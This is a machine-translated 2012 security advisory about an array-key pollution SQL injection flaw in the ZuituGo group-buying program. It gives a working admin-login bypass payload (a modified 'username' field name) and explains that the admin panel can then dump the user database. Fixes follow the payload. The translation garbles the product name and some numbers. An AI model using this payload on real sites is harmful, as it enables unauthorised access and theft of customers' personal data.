Most soil buy the program to the latest sql injection exploits and fixes-vulnerability warning-the black bar safety net

2012-04-15T00:00:00
ID MYHACK58:62201233670
Type myhack58
Reporter 佚名
Modified 2012-04-15T00:00:00

Description

Recent most soil buy the Program 3. 0_20111207 broke a high-risk vulnerability by the vulnerability exploit method, an intruder can in 1 0 seconds to get the most soil group purchase site a lot user information and order information, etc.

Because most of the soil is the buy class of the program, the database holds the user's mailbox and the telephone, and even the user's address, etc., on the website the user, these privacy information once someone else gets, will bring a lot of trouble.

3 6 0 security engineers, analysts believe that“this is a quite typical and also very classic array key variable pollution vulnerability.‘ Most soil group purchase’the establishment of the station program code, since the function of the filter is not strict, resulting in hackers can submit malicious code, control program flow, to bypass the login when the judge, Go directly to the website background.

The test method is as follows:

  1. Use opera browser to open the website, the default background address: manage/login.php

  2. Right-view the source code. Find the following code:

<div>

<label for="manage-login">login</label>

<input type="text" size="3 0" name="username" id="manage-username" datatype="require" require="true" />

</div>

  1. Which will be name="username" was changed to: name="username[=0x7c or manager=1#]",Click on browser on the app save.

  2. Directly in the account s,password s login background.

Because most soil buy the program background can directly backup the database to a local operation, so once into the background, if the server is not on the backup file download permissions be set, is that you can directly backup the database to local, and therefore the user of information security threats is relatively large.

For the above vulnerability repair method:

  1. Upgrade most soil buy the program to the latest version of ZuituGo_CV2. 0_20111231;

  2. If you don't want to download the huge source code of the upgrade package, you can also refer to the following repair solutions:

In the Include/classes/ ZUser.class.php to find"static public function GetLogin($email, $unpass, $en=true) { "that login authentication function to define the place; in which the following was added as code"if(is_array($email)) return array();"vulnerabilities to fix. www.2cto.com

  1. Recommendations for the backend database backup to local for backup file ban download permission settings.

  2. For the background of the landing to increase the verification code.

Part of the solution with reference to Online information, in particular the feasibility of the self-study.

The article is only for learning reference, please don't do sabotage.